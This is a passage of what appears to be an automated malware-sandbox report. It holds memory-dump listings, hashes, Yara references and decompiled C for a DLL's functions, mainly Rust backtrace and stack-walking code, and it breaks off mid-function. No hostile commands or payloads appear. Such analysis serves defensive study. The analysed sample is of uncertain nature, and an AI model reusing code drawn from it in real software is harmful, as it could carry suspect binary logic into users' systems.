                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
                          • Instruction ID: a42c1f9da4df542ca2bb8f8db343915fbd496b3e6b61d0c4458ad83bc030b95d
                          • Opcode Fuzzy Hash: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
                          • Instruction Fuzzy Hash: 94E08C7291123CEBCB14CBC8C941A8AF7ECEB44A84B11009AB511D3500C3B0DE40CBC0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24EC0B, Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
                          • Instruction ID: f2c2645e3720a3ded7c4caff98ed7ddef5d4cfa4252c3035c55770d0bcf4fbf6
                          • Opcode Fuzzy Hash: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
                          • Instruction Fuzzy Hash: 8CC08C74402E0A46DE09DB10D6703A43364F782B87F90288CC8468FA81D65EB887DE00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012207D2, Relevance: .0, Instructions: 2COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                          • Instruction Fuzzy Hash:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23DEE0, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451memorylibraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6F23DEE0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6F243B90;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6F24C310(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6f27d0bc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6F257370(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6F256DB0(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6f27ded0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6F240EC0(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6f28adc8, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6f28adc8, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6f28adc8, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6f27d5c8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6f27cd60;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6F232320( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6f28adc8, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6f27d5d0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6F24C310(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6F249EEE();
						_t217 = E6F23E690(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6f28ade8; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6f28add0, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6F256E20(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6f27e2c0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6f28ade8 = _t218;
									_t267 =  *0x6f28adec; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6f28adec; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6f28adf8; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6F24C310(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6F23E890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6f28add0, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6F24C310(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6f28ade4; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6f28add0, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6F256E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6f27e2c0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6f28ade4 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6F23E890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6f28adf8 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6f28add0, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6F256E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6f27e2c0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6F23E880( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6f28adec = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6f28adc8, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6f27d63c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6f27cd60;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6F232320( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}



















































                          0x6f23dee3
                          0x6f23dee4
                          0x6f23dee5
                          0x6f23dee9
                          0x6f23deef
                          0x6f23def1
                          0x6f23def7
                          0x6f23defd
                          0x6f23df07
                          0x6f23df21
                          0x6f23df27
                          0x6f23df2e
                          0x6f23df30
                          0x6f23df33
                          0x6f23df44
                          0x6f23df49
                          0x6f23df4c
                          0x6f23df51
                          0x6f23df56
                          0x6f23df5d
                          0x6f23df60
                          0x6f23df67
                          0x6f23df6a
                          0x6f23df77
                          0x6f23df7a
                          0x6f23df96
                          0x6f23df96
                          0x6f23df9c
                          0x6f23dfa0
                          0x6f23dfa2
                          0x6f23dfa4
                          0x6f23dfae
                          0x6f23dfb2
                          0x6f23dfb7
                          0x6f23dfbd
                          0x6f23dfbd
                          0x6f23dfc0
                          0x6f23dfc3
                          0x6f23dfc6
                          0x6f23dfc9
                          0x6f23dfcc
                          0x6f23dfcf
                          0x6f23df7c
                          0x6f23dfe0
                          0x6f23dfe0
                          0x6f23dfe6
                          0x6f23dfed
                          0x6f23dfed
                          0x6f23dff0
                          0x6f23dff2
                          0x6f23dffa
                          0x6f23e000
                          0x6f23e004
                          0x6f23e012
                          0x6f23df80
                          0x6f23df83
                          0x6f23df85
                          0x6f23e03d
                          0x6f23e040
                          0x6f23e04a
                          0x6f23e04c
                          0x6f23e568
                          0x00000000
                          0x6f23e052
                          0x6f23e052
                          0x6f23e055
                          0x6f23e058
                          0x6f23e059
                          0x6f23e05e
                          0x6f23e064
                          0x6f23e069
                          0x6f23e06b
                          0x6f23e06e
                          0x6f23e073
                          0x6f23e076
                          0x6f23e078
                          0x00000000
                          0x00000000
                          0x6f23e07a
                          0x00000000
                          0x6f23e078
                          0x6f23df8b
                          0x6f23df8b
                          0x6f23df91
                          0x6f23df94
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23df94
                          0x6f23e027
                          0x6f23e02a
                          0x6f23e032
                          0x6f23e035
                          0x00000000
                          0x6f23e03b
                          0x00000000
                          0x6f23e03b
                          0x00000000
                          0x6f23e035
                          0x6f23e07c
                          0x6f23e07c
                          0x6f23e082
                          0x6f23e084
                          0x6f23e087
                          0x6f23e08e
                          0x6f23e091
                          0x6f23e093
                          0x6f23e095
                          0x6f23e095
                          0x6f23e099
                          0x6f23e09b
                          0x6f23e0a0
                          0x6f23e0ad
                          0x6f23e0ad
                          0x6f23e0a0
                          0x6f23e099
                          0x6f23e0b2
                          0x6f23e0b2
                          0x6f23e0b4
                          0x6f23e11e
                          0x6f23e121
                          0x6f23e124
                          0x6f23e127
                          0x6f23e12a
                          0x6f23e0b6
                          0x6f23e0b6
                          0x6f23e0ba
                          0x6f23e0bc
                          0x6f23e0c1
                          0x6f23e0c7
                          0x6f23e0d2
                          0x6f23e0d4
                          0x6f23e0d7
                          0x6f23e0da
                          0x6f23e0dd
                          0x6f23e0e1
                          0x6f23e0e3
                          0x6f23e0e5
                          0x6f23e0e9
                          0x6f23e0eb
                          0x6f23e0eb
                          0x6f23e0f7
                          0x6f23e0fc
                          0x6f23e0fc
                          0x6f23e108
                          0x6f23e108
                          0x6f23e10d
                          0x6f23e110
                          0x6f23e112
                          0x6f23e112
                          0x6f23e134
                          0x6f23e137
                          0x6f23e13d
                          0x6f23e140
                          0x6f23e143
                          0x6f23e14d
                          0x6f23e157
                          0x6f23e161
                          0x6f23e16b
                          0x6f23e178
                          0x6f23e181
                          0x6f23e182
                          0x6f23e187
                          0x6f23e18a
                          0x6f23e18c
                          0x6f23e405
                          0x6f23e405
                          0x6f23e408
                          0x6f23e40a
                          0x6f23e40c
                          0x6f23e410
                          0x6f23e41b
                          0x6f23e41b
                          0x6f23e410
                          0x6f23e420
                          0x00000000
                          0x6f23e192
                          0x6f23e192
                          0x6f23e198
                          0x6f23e19f
                          0x6f23e1a3
                          0x6f23e1a6
                          0x6f23e1ad
                          0x6f23e1af
                          0x6f23e1b8
                          0x6f23e1be
                          0x6f23e1c1
                          0x6f23e1c8
                          0x6f23e1cc
                          0x6f23e1d2
                          0x6f23e1d8
                          0x6f23e1de
                          0x6f23e1e6
                          0x6f23e1ef
                          0x6f23e1f9
                          0x6f23e200
                          0x6f23e205
                          0x6f23e208
                          0x6f23e209
                          0x6f23e20e
                          0x6f23e213
                          0x6f23e215
                          0x6f23e226
                          0x6f23e22c
                          0x6f23e22f
                          0x6f23e231
                          0x6f23e24a
                          0x6f23e250
                          0x6f23e252
                          0x6f23e595
                          0x6f23e5ae
                          0x00000000
                          0x6f23e258
                          0x6f23e258
                          0x6f23e25a
                          0x6f23e25f
                          0x6f23e265
                          0x6f23e267
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23e267
                          0x6f23e233
                          0x6f23e233
                          0x6f23e239
                          0x6f23e23b
                          0x6f23e289
                          0x6f23e28e
                          0x6f23e291
                          0x6f23e296
                          0x6f23e299
                          0x6f23e29c
                          0x6f23e29e
                          0x6f23e2be
                          0x6f23e2be
                          0x6f23e2c7
                          0x6f23e2ce
                          0x6f23e2dd
                          0x6f23e2e2
                          0x6f23e2f7
                          0x6f23e2fe
                          0x6f23e301
                          0x6f23e30b
                          0x6f23e311
                          0x6f23e31b
                          0x6f23e325
                          0x6f23e32b
                          0x6f23e335
                          0x6f23e340
                          0x6f23e35e
                          0x6f23e361
                          0x6f23e364
                          0x00000000
                          0x00000000
                          0x6f23e376
                          0x6f23e37c
                          0x6f23e386
                          0x6f23e38b
                          0x6f23e38e
                          0x6f23e391
                          0x6f23e393
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23e393
                          0x00000000
                          0x6f23e2a0
                          0x6f23e2ab
                          0x6f23e2b1
                          0x6f23e2b3
                          0x6f23e464
                          0x6f23e469
                          0x6f23e47e
                          0x6f23e485
                          0x6f23e48c
                          0x6f23e496
                          0x6f23e49d
                          0x6f23e4a0
                          0x6f23e4aa
                          0x6f23e4b0
                          0x6f23e4ba
                          0x6f23e4c4
                          0x6f23e4ca
                          0x6f23e4d4
                          0x6f23e4e0
                          0x6f23e4e0
                          0x6f23e4e6
                          0x6f23e4e8
                          0x6f23e506
                          0x6f23e522
                          0x6f23e524
                          0x6f23e527
                          0x6f23e395
                          0x6f23e398
                          0x6f23e39d
                          0x6f23e3a1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23e4ea
                          0x6f23e4f5
                          0x6f23e4fb
                          0x6f23e4fd
                          0x6f23e572
                          0x6f23e58b
                          0x00000000
                          0x6f23e4ff
                          0x6f23e4ff
                          0x6f23e501
                          0x00000000
                          0x6f23e501
                          0x6f23e4fd
                          0x00000000
                          0x6f23e52d
                          0x6f23e53d
                          0x6f23e543
                          0x6f23e54d
                          0x6f23e552
                          0x6f23e555
                          0x6f23e558
                          0x6f23e558
                          0x00000000
                          0x6f23e2b9
                          0x6f23e2b9
                          0x00000000
                          0x6f23e2b9
                          0x6f23e2b3
                          0x6f23e23d
                          0x6f23e269
                          0x6f23e274
                          0x6f23e27a
                          0x6f23e27c
                          0x6f23e5b8
                          0x6f23e5d1
                          0x6f23e5d9
                          0x6f23e5d9
                          0x6f23e5e0
                          0x6f23e5fc
                          0x6f23e282
                          0x6f23e282
                          0x6f23e284
                          0x00000000
                          0x6f23e284
                          0x6f23e27c
                          0x6f23e23b
                          0x6f23e217
                          0x6f23e217
                          0x6f23e21b
                          0x00000000
                          0x6f23e221
                          0x6f23e3a3
                          0x6f23e3a3
                          0x6f23e3a7
                          0x6f23e437
                          0x6f23e437
                          0x6f23e43a
                          0x6f23e43c
                          0x6f23e43e
                          0x6f23e442
                          0x6f23e44d
                          0x6f23e44d
                          0x6f23e442
                          0x6f23e452
                          0x6f23e3ad
                          0x6f23e3b0
                          0x6f23e3ba
                          0x6f23e3c4
                          0x6f23e3ce
                          0x6f23e3d8
                          0x6f23e3e2
                          0x6f23e3f8
                          0x6f23e3f9
                          0x6f23e401
                          0x6f23e403
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23e403
                          0x6f23e3a7
                          0x6f23e422
                          0x6f23e428
                          0x6f23e436
                          0x6f23e436
                          0x6f23e215
                          0x6f23e18c
                          0x00000000

                          APIs
                          • SetLastError.KERNEL32(00000000), ref: 6F23DFF2
                          • GetCurrentDirectoryW.KERNEL32(?,?), ref: 6F23DFFA
                          • GetLastError.KERNEL32 ref: 6F23E006
                          • GetLastError.KERNEL32 ref: 6F23E018
                          • GetLastError.KERNEL32 ref: 6F23E07C
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6F23E0AD
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23E0F7
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23E108
                          • GetCurrentProcess.KERNEL32(?), ref: 6F23E1E1
                          • GetCurrentThread.KERNEL32 ref: 6F23E1E9
                          • RtlCaptureContext.KERNEL32(?), ref: 6F23E209
                          • GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6F23E24A
                          • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6F23E274
                          • GetCurrentProcess.KERNEL32 ref: 6F23E289
                          • GetProcAddress.KERNEL32(StackWalkEx), ref: 6F23E2AB
                          • ReleaseMutex.KERNEL32(?), ref: 6F23E398
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23E41B
                          • HeapFree.KERNEL32(00000000,?,?), ref: 6F23E44D
                          • GetProcAddress.KERNEL32(StackWalk64), ref: 6F23E4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
                          • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
                          • API String ID: 1381040140-1036201984
                          • Opcode ID: f4295deff1f09b3f322118f9920b88205ed36aae3ba3b50b73bb151dec997bf2
                          • Instruction ID: 8a5430925a3271f593de51d4acebd586752ddda834b8d6a51deecbf2f87f9f19
                          • Opcode Fuzzy Hash: f4295deff1f09b3f322118f9920b88205ed36aae3ba3b50b73bb151dec997bf2
                          • Instruction Fuzzy Hash: E21227B1A00F099FE721CF24C984B93BBF5BF4A309F00491DD5AA86A90DB75B859CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C8C0, Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 477memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E6F23C8C0(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
